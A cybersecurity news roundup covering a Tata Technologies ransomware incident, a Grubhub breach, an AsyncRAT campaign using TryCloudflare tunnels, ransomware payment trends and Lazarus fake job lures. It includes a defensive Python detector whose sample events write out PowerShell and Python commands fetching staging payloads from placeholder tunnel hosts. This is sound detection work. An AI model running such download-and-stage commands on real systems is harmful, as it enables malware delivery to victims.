India’s Tata Technologies suspends some IT services after ransomware attack
Tata Technologies Ltd., a subsidiary of Tata Motors, was hit by a ransomware attack, forcing the company to temporarily suspend some IT services. The Indian multinational company, which specializes in automotive design, aerospace engineering and R&D, operates across multiple regions and employs over 11,000 people.
The company informed India's national stock exchange that the affected IT assets have now been restored, and client delivery services remained unaffected throughout the incident. A detailed investigation is underway with cybersecurity experts, but no ransomware group has claimed responsibility, and it remains unclear if data was stolen.
This is not the first attack on a Tata-owned company, as the Hive ransomware group previously targeted Tata Power in October 2022, leaking sensitive data on the dark web. In India, the number of reported ransomware attack incidents impacting various sectors totaled 98 in 2024, which represents a 55% increase compared to the 63 attacks recorded in 2023.
Customers and drivers affected after a data breach at Grubhub
Grubhub, a major U.S. food delivery platform, confirmed that attackers breached its internal systems, exposing personal details of customers, merchants and drivers. The platform, which operates in over 4,000 U.S. cities, was acquired by Wonder Group in 2023 for $650 million, significantly less than its $7.3 billion valuation in 2020.
The company detected “unusual activity” linked to a third-party service provider, prompting an investigation and the immediate removal of the provider from its systems. The data breach compromised names, email addresses, phone numbers and partial payment card details, including the last four digits, primarily affecting Campus Dining users.
While hashed passwords for legacy systems were accessed, bank account details and Social Security numbers were not impacted, according to Grubhub. The company has yet to disclose the total number of affected individuals or the exact timeline of the breach.
Python payloads and TryCloudflare tunnels used in campaign to deliver AsyncRAT malware
A newly discovered malware campaign has been using Python payloads and TryCloudflare tunnels to deliver AsyncRAT, a remote access trojan (RAT) used for data exfiltration and stealthy system control.
The attack begins with a phishing email containing a Dropbox URL that downloads a ZIP archive, which includes an LNK file and a decoy PDF document to trick recipients. The LNK file, retrieved via TryCloudflare, executes PowerShell scripts that download additional malware payloads, including AsyncRAT, Venom RAT and XWorm.
A similar attack variant last year distributed GuLoader, PureLogs Stealer, and Remcos RAT, sometimes exploiting a Windows MotW bypass vulnerability (CVE-2024-38213). Cybercriminals are increasingly misusing legitimate services like Dropbox and TryCloudflare to distribute malware while making attacks appear credible.
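The delivery chain above (a double-clicked LNK spawning PowerShell, which fetches staging payloads from a TryCloudflare tunnel) leaves a recognizable footprint in process-creation telemetry. The following detector is an added example written for this roundup; it is not code from the researchers or the article. It assumes Sysmon-style process-creation events (image, parent image, command line) serialized as JSON lines, and that the campaign's staging hosts use the default *.trycloudflare.com hostnames. All sample events are constructed for the example.

```python
"""Flag process-creation events matching the LNK -> PowerShell -> TryCloudflare
delivery chain. Added example with constructed, Sysmon-style JSON events; the
field names and sample values are assumptions, not real telemetry."""
import json
import re
from typing import Optional
from urllib.parse import urlparse

# TryCloudflare hands out ephemeral hostnames under this suffix (assumption:
# the staging URLs in the campaign use those default hostnames).
TUNNEL_SUFFIX = ".trycloudflare.com"

# Script hosts the campaign chains through: PowerShell stagers and Python payloads.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "python.exe", "pythonw.exe", "cmd.exe"}

# A double-clicked LNK file shows up in telemetry as a child of explorer.exe.
LNK_LAUNCHER = "explorer.exe"

URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)


def extract_urls(command_line: str) -> list:
    """Return every http(s) URL embedded in a command line."""
    return URL_RE.findall(command_line)


def tunnel_hosts(command_line: str) -> list:
    """Return the hostnames in the command line that sit under the tunnel suffix."""
    hosts = []
    for url in extract_urls(command_line):
        host = urlparse(url).hostname or ""
        if host.endswith(TUNNEL_SUFFIX):
            hosts.append(host)
    return hosts


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Optional[dict]:
    """Rate one process-creation event; None means nothing suspicious."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "")
    if image not in SCRIPT_HOSTS:
        return None  # browsers and ordinary apps legitimately carry URLs
    hosts = tunnel_hosts(cmdline)
    if hosts:
        return {"severity": "high", "image": image, "hosts": hosts,
                "reason": "script host fetching from a TryCloudflare tunnel"}
    if parent == LNK_LAUNCHER and extract_urls(cmdline):
        return {"severity": "medium", "image": image, "hosts": [],
                "reason": "script host launched from explorer.exe (LNK-style) with a URL"}
    return None


def scan(lines: list) -> list:
    """Run score_event over JSON log lines and collect findings in input order."""
    findings = []
    for line in lines:
        event = json.loads(line)
        hit = score_event(event)
        if hit:
            hit["record_id"] = event.get("record_id")
            findings.append(hit)
    return findings


# Constructed sample telemetry (not real events). Record 1 and 3 mirror the
# campaign's chain; 2 and 5 are benign; 4 is suspicious but without a tunnel host.
SAMPLE_EVENTS = [
    {"record_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -Command "Invoke-WebRequest https://abc-words-example.trycloudflare.com/stage2.ps1 -OutFile $env:TEMP\\s.ps1"'},
    {"record_id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"record_id": 3, "image": r"C:\Users\u\AppData\Local\Programs\Python\python.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"python.exe C:\Users\u\AppData\Local\Temp\loader.py https://xyz-demo.trycloudflare.com/x"},
    {"record_id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -Command "Invoke-WebRequest https://updates.example.invalid/u.ps1"'},
    {"record_id": 5, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "chrome.exe https://example.invalid/"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

The medium tier exists because TryCloudflare hostnames are disposable: a campaign can rotate them at will, so the more durable signal is the shape of the chain (a script interpreter parented by explorer.exe that immediately reaches out to a URL), with the tunnel suffix used to raise severity rather than as the only trigger.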
Increased resistance to cyber extortion as ransomware payments fell by 35% in 2024
Ransomware payments dropped by 35% in 2024, totaling $813.55 million, compared to $1.25 billion in 2023, as reported by researchers. Only 30% of victims who engaged in negotiations paid the ransom, reflecting increased resistance against cyber extortion.
Despite the decline in payments, 2024 saw a record 5,263 ransomware breaches, the highest ever recorded. A Fortune 50 company paid $75 million to the Dark Angels ransomware group, marking the largest single payment of the year.
Law enforcement crackdowns, including Operation Cronos against LockBit, and the ALPHV/BlackCat exit scam, significantly disrupted major ransomware groups. The median ransom payment dropped in 2024, indicating that even when payments were made, they were often negotiated down. 39% of ransomware proceeds were laundered through centralized exchanges, while cybercriminals increasingly used cross-chain bridges to evade tracking. More ransomware affiliates are now holding proceeds in personal wallets, fearing law enforcement action, which complicates laundering efforts.
Fake LinkedIn job offers used by North Korean hackers to target businesses
The North Korean Lazarus Group is using fake LinkedIn job offers to trick individuals into sharing sensitive data and installing malware.
Victims are lured with offers to collaborate on a decentralized crypto exchange, submitting CVs or GitHub links as part of the recruitment process. Attackers then provide access to a fake demo project, which, when executed, downloads malicious payloads. The malware first steals cryptocurrency wallet data before deploying additional components to monitor activity, extract files and capture browser logins. Further payloads, delivered via Tor Proxy servers, include a persistent backdoor, keylogger and cryptominer.
According to researchers, Lazarus' real goal is to steal classified data from critical industries. For that reason, the researchers are urging professionals to scrutinize vague job offers and avoid executing foreign code on enterprise devices.